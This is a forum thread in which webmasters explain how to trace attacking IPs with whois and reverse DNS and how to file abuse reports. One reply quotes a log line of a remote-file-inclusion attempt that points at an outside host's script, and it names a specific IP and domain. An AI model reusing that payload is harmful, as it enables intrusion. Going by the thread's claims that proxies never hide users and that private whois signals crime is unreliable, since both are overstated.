Checking the logs and noticed a few people are trying to hack/hotlink my site. I've got their IP details, could I then find which web site they came from?
If IP is unique to hacker, not a shared ip, you might see if a web site comes up when you type http://ip, I have no idea about a shared ip. Shannon
most likely they aren't running these things from the same IP their site (if they have one) is hosted on. your chances of finding something are pretty slim, but yes, you could try just http://ip
I tried entering http://ip but no luck. I think the IP is from a web site since it links to more than one file.
When you're talking about an IP, are you talking about the IP in a referrer field? If not, then why are you saying it's a website? If you want to find out an administrative contact for the IP address of someone you think is trying to hack in, go to www.samspade.org and put the IP in the first box and click "Do Stuff". It'll do a whois on the IP address, which will give you contact information for the owners of the IPs. -Nev
try http://www.whois.sc/IPADDRESS you have to register to see all hosted websites though, in case that more than 1 domain is hosted on that IP
much easier than all above on a normal professional Linux desktop - all in shell ( bash ) here a near real time real world example from a hacker attempt a few hours back: 0. log lines - you send all - below is only one for you: 85.214.42.97 - - [11/Nov/2007:03:50:02 +0800] "GET /english//include/config.inc.php?root=http://www.salcedo.com.do/visitas//id.txt? HTTP/1.1" 403 1012 "-" "libwww-perl/5.803" 1. > host 85.214.42.97 97.42.214.85.in-addr.arpa domain name pointer geest-verlag.de. >> gives you a domain name / web site if any associated then you have the option - again in bash 2. now you may want to know WHO above site owner is - in bash > whois geest-verlag.de may give you full name, address, email, etc OR NOT if people want to hide never mind - in case of hacker or abuse you always go directly to HIGHEST level that is 3. whois 85.214.42.97 a whois on IP gives you the NETWORK - owner, i.e. an ISP or a datacenter!! their entry normally is LONG and meets all common legal requirements, no hiding anymore - HIDING of whois data is for CRIMINALS and people who eventually may plan to so such or similar illegal things. honest site owners always have a full and public WHOIS record ! you usually always find an abuse email address to report hacker attacks or copyright infringement abuse originating FROM ANY of their IPs - no matter wether domain name associated or dynamic IP. if NO abuse@ ... listed but only the network domain name still send your email to abuse@ that web site of network owner - abuse addresses are required and networks have one even if NOT listed in addition on the above whois "IP" you normally get hostmaster@ and a few other email addresses with short comments send your email to all listed addresses to assure it is processed the fastest way hence an eMail TO: abuse@ xyz hostmaster@ xyz webmaster@ xyz always include facts and solid legal FULL evidence of hot linking and copyright infringement. make it a professional email with ALL data and all facts that allow an instant and final reaction by the network owner! in case of hacker attempts - include all related log lines from your access_log or error_log or /var/log/messages depending on the kind of hacker attack remember that ALL is logged and if at a certain time a dynamic IP was used for 60 seconds - accessed via cable or however - that origin or the 60 seconds access is logged and can normally always be tracked to the apartment and computer being used - even if hacker uses proxy !! with proxy it simply needs one more step - but procedure to track is the same. hence to track down an IP to its data center is a matter of seconds - to send the abuse complaint another few minutes in case of hacker abuse just forward the log lines your server SENT YOU with 2-3 lines - no extra comments needed - the log lines say it all - see above case. example for above real scenario situation this morning: active hacker from your network IP 85.214.42.97 attached loglines from a hacker visit on my server a few hours ago log times are GMT +8 the first line should/might be a clear subject line for an email to abuse@ so the person on duty instantly sees the priority of your mail - hacker stuff may be done in seconds because hackers may do substantial damage to OTHERS as well - copyright infringement may have a few hours longer. NEVER waste your time emailing the actual site owner. most site owners have NO idea about their own site NOR about security NOR about how to solve - a hostmaster shuts their site down in minutes or at least shuts down the path from within which abuse took place while site owners love to argue and lose / waste your precious time. in addition many site OWNERS lack the required email addresses such as info@, webmaster@ and abuse@ hence you email to a site and hours later you may get all emails bouncing back and nothing at all has been done.
I lol'd at "how" is he This should help: http://www.geekpedia.com/tutorial144_Log-visitors-with-PHP-and-MySQL.html A simpler way might to be install a counter or tracking script like google analytics.
Every device connected to the public Internet is assigned a unique number known as an Internet Protocol (IP) address. IP addresses consist of four numbers separated by periods (also called a 'dotted-quad') and look something like 127.0.0.1. Since these numbers are usually assigned to internet service providers within region-based blocks, an IP address can often be used to identify the region or country from which a computer is connecting to the Internet. An IP address can sometimes be used to show the user's general location.